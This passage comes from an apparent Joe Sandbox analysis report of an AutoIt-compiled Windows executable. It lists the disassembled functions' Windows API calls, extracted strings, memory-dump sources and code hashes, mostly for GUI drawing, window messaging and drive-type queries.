                                          • FillRect.USER32(?,?,?), ref: 00E5A9D2
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5A9FD
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(00000012), ref: 00E5AB99
                                            • Part of subcall function 00E5AB60: SetTextColor.GDI32(?,?), ref: 00E5AB9D
                                            • Part of subcall function 00E5AB60: GetSysColorBrush.USER32(0000000F), ref: 00E5ABB3
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(0000000F), ref: 00E5ABBE
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(00000011), ref: 00E5ABDB
                                            • Part of subcall function 00E5AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E5ABE9
                                            • Part of subcall function 00E5AB60: SelectObject.GDI32(?,00000000), ref: 00E5ABFA
                                            • Part of subcall function 00E5AB60: SetBkColor.GDI32(?,00000000), ref: 00E5AC03
                                            • Part of subcall function 00E5AB60: SelectObject.GDI32(?,?), ref: 00E5AC10
                                            • Part of subcall function 00E5AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E5AC2F
                                            • Part of subcall function 00E5AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E5AC46
                                            • Part of subcall function 00E5AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E5AC5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: a71f502f86d0acce76a799c3f316d781570d50dfd76e8871fb2cb5668642c491
                                          • Instruction ID: ce12d1bac03bccb68e67851230baf269ff9e213b0ede18bd60d0ae9b183bdfb2
                                          • Opcode Fuzzy Hash: a71f502f86d0acce76a799c3f316d781570d50dfd76e8871fb2cb5668642c491
                                          • Instruction Fuzzy Hash: E7A19072008301AFD7149F65DC08A6BBBA9FF88326F145F29F962A61E1D770D848CB52
                                          Function 00E477BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00E477F1
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E478B0
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E478EE
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E47900
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E47946
                                          • GetClientRect.USER32(00000000,?), ref: 00E47952
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E47996
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E479A5
                                          • GetStockObject.GDI32(00000011), ref: 00E479B5
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E479B9
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E479C9
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E479D2
                                          • DeleteDC.GDI32(00000000), ref: 00E479DB
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E47A07
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E47A1E
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E47A59
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E47A6D
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E47A7E
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E47AAE
                                          • GetStockObject.GDI32(00000011), ref: 00E47AB9
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E47AC4
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E47ACE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: c2f78785a617c96437ea248451ff2a97e6fc609846b8405c10b499ac75ed8d13
                                          • Instruction ID: 227f9c9f79c318511fe04392e74267a7196ee289fe7499ca8d75b66d9f64f95d
                                          • Opcode Fuzzy Hash: c2f78785a617c96437ea248451ff2a97e6fc609846b8405c10b499ac75ed8d13
                                          • Instruction Fuzzy Hash: 8AA19071A00215BFEB14DBA5DD4AFAEBBB9EB48711F004516FA14B72E0D770AD04CBA0
                                          Function 00E3AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3AF89
                                          • GetDriveTypeW.KERNEL32(?,00E5FAC0,?,\\.\,00E5F910), ref: 00E3B066
                                          • SetErrorMode.KERNEL32(00000000,00E5FAC0,?,\\.\,00E5F910), ref: 00E3B1C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 021c2a8fcd2ba937fa9978f101333f86a1f97b7814b139b6487ad998146e9b72
                                          • Instruction ID: 541f1769f92606157a1a410222261f9c1836ec81be9f9e0a67070b7028f70919
                                          • Opcode Fuzzy Hash: 021c2a8fcd2ba937fa9978f101333f86a1f97b7814b139b6487ad998146e9b72
                                          • Instruction Fuzzy Hash: 2C51C630681305EB9B04EB10C9AA9BD7BB0EB14345F247027F60FB7291D7B69D41EB92
                                          Function 00DD6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          • Opcode ID: 4f474c255906cff034cb39663b3bc990544afcbf3cf82971b15367ad7710c3ba
                                          • Instruction ID: 14978c680bdd6f074b56ca806a8950149516145c3fae5c2e8196c057aa7ac5c7
                                          • Opcode Fuzzy Hash: 4f474c255906cff034cb39663b3bc990544afcbf3cf82971b15367ad7710c3ba
                                          • Instruction Fuzzy Hash: 1581ECB0640715B6CB24AB60DC82FBE7758EF14704F099427FE46B63C2EB60DA55C6B1
                                          Function 00DD2C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00DD2CA2
                                          • DeleteObject.GDI32(00000000), ref: 00DD2CE8
                                          • DeleteObject.GDI32(00000000), ref: 00DD2CF3
                                          • DestroyCursor.USER32(00000000), ref: 00DD2CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00DD2D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E0C68B
                                          • 6F540200.COMCTL32(?,000000FF,?), ref: 00E0C6C4
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E0CAED
                                            • Part of subcall function 00DD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD2036,?,00000000,?,?,?,?,00DD16CB,00000000,?), ref: 00DD1B9A
                                          • SendMessageW.USER32(?,00001053), ref: 00E0CB2A
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E0CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                          • String ID: 0
                                          • API String ID: 22932394-4108050209
                                          • Opcode ID: 5bd388ab8dedff6a733dcaee872b86bc107715f4ab9f7c051aa2232ccacab19d
                                          • Instruction ID: a30d8e48fc228689aead76d5c17424cc5b901879521ba31a9b046b092d3ee9e6
                                          • Opcode Fuzzy Hash: 5bd388ab8dedff6a733dcaee872b86bc107715f4ab9f7c051aa2232ccacab19d
                                          • Instruction Fuzzy Hash: F412A330600201DFDB24CF28C884BA9B7E5FF55315F68566AF595EB2A2C731EC85CB61
                                          Function 00E5AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 00E5AB99
                                          • SetTextColor.GDI32(?,?), ref: 00E5AB9D
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E5ABB3
                                          • GetSysColor.USER32(0000000F), ref: 00E5ABBE
                                          • CreateSolidBrush.GDI32(?), ref: 00E5ABC3
                                          • GetSysColor.USER32(00000011), ref: 00E5ABDB
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E5ABE9
                                          • SelectObject.GDI32(?,00000000), ref: 00E5ABFA
                                          • SetBkColor.GDI32(?,00000000), ref: 00E5AC03
                                          • SelectObject.GDI32(?,?), ref: 00E5AC10
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E5AC2F
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E5AC46
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E5AC5B
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E5ACA7
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E5ACCE
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E5ACEC
                                          • DrawFocusRect.USER32(?,?), ref: 00E5ACF7
                                          • GetSysColor.USER32(00000011), ref: 00E5AD05
                                          • SetTextColor.GDI32(?,00000000), ref: 00E5AD0D
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E5AD21
                                          • SelectObject.GDI32(?,00E5A869), ref: 00E5AD38
                                          • DeleteObject.GDI32(?), ref: 00E5AD43
                                          • SelectObject.GDI32(?,?), ref: 00E5AD49
                                          • DeleteObject.GDI32(?), ref: 00E5AD4E
                                          • SetTextColor.GDI32(?,?), ref: 00E5AD54
                                          • SetBkColor.GDI32(?,?), ref: 00E5AD5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: bcf8e42cbdd16b35bbb349656135e19921e679ff2a28e7b358717bf642f653a9
                                          • Instruction ID: bee22aba42e70f7f61ed422cbd6eb185fc07304521b4eeb860227aabd61b7e12
                                          • Opcode Fuzzy Hash: bcf8e42cbdd16b35bbb349656135e19921e679ff2a28e7b358717bf642f653a9
                                          • Instruction Fuzzy Hash: 58619E71900208EFDF159FA5DC48EAEBB79EF08322F148A25F911BB2A1D7719D44CB90
                                          Function 00E58C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E58D34
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E58D45
                                          • CharNextW.USER32(0000014E), ref: 00E58D74
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E58DB5
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E58DCB
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E58DDC
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E58DF9
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E58E45
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E58E5B
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E58E8C
                                          • _memset.LIBCMT ref: 00E58EB1
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E58EFA
                                          • _memset.LIBCMT ref: 00E58F59
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E58F83
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E58FDB
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00E59088
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E590AA
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E590F4
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E59121
                                          • DrawMenuBar.USER32(?), ref: 00E59130
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E59158
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: b5d00c5d9343a4bd0f9e33040db7d5fba1c916398f724daf27ee9d1dc7143023
                                          • Instruction ID: 67ddcce2a976120a2c936c0e33e3743a9161cfde05f738a097ebc9919193451d
                                          • Opcode Fuzzy Hash: b5d00c5d9343a4bd0f9e33040db7d5fba1c916398f724daf27ee9d1dc7143023
                                          • Instruction Fuzzy Hash: 31E1AF70901219AFDF209F61CD84EEE7BB9EF05315F00995AFD15BA291DB708A89CF60
                                          Function 00E54B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00E54C51
                                          • GetDesktopWindow.USER32 ref: 00E54C66
                                          • GetWindowRect.USER32(00000000), ref: 00E54C6D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E54CCF
                                          • DestroyWindow.USER32(?), ref: 00E54CFB
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E54D24
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E54D42
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E54D68
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00E54D7D
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E54D90
                                          • IsWindowVisible.USER32(?), ref: 00E54DB0
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E54DCB
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E54DDF
                                          • GetWindowRect.USER32(?,?), ref: 00E54DF7
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E54E1D
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E54E37
                                          • CopyRect.USER32(?,?), ref: 00E54E4E
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00E54EB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: bdfbe86022714b05d0d67ab71a777feea7f4702f01991a7acae4f4c4f67c4927
                                          • Instruction ID: a73b6e9b42a15f3f3524926e1c85fff42483089c2e5823ea68faad052478b3de
                                          • Opcode Fuzzy Hash: bdfbe86022714b05d0d67ab71a777feea7f4702f01991a7acae4f4c4f67c4927
                                          • Instruction Fuzzy Hash: 8DB15AB1604340AFDB44DF25C849B5ABBE5FF84319F008D1DF999AB2A1DB71D848CBA1
                                          Function 00DD27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD28BC
                                          • GetSystemMetrics.USER32(00000007), ref: 00DD28C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD28EF
                                          • GetSystemMetrics.USER32(00000008), ref: 00DD28F7
                                          • GetSystemMetrics.USER32(00000004), ref: 00DD291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DD2939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DD2949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DD297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DD2990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 00DD29AE
                                          • GetStockObject.GDI32(00000011), ref: 00DD29CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD29D5
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00DD1256), ref: 00DD29FC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 408eadacee4469c52a1ad97191bdd941df948206dad49789362b3094590718c5
                                          • Instruction ID: 1793231c5935e9471cbb5aca9bb54c39d634902fdfc15c681ff00676980a3d1a
                                          • Opcode Fuzzy Hash: 408eadacee4469c52a1ad97191bdd941df948206dad49789362b3094590718c5
                                          • Instruction Fuzzy Hash: D6B15E71A0020AEFDB14DFA9DC45BAE7BB4FB18315F10862AFA15A72D0DB74D845CB60
                                          Function 00E346D6 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 390803403-1459072770
                                          • Opcode ID: 37c5ba79f7cc60182d74bcd079e4bce1e324be4d94616d25977ed82c5b34c681
                                          • Instruction ID: c409dc485d5345b624f020d1c8c227bf1b479b640803afd74e362d5a31ce20bc
                                          • Opcode Fuzzy Hash: 37c5ba79f7cc60182d74bcd079e4bce1e324be4d94616d25977ed82c5b34c681
                                          • Instruction Fuzzy Hash: C2410871A00308BAEB14B7658C47EBF7BACDF45710F058166FA08F6182EB75AA0197B5
                                          Function 00E54069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E540F6
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E541B6
                                          Strings
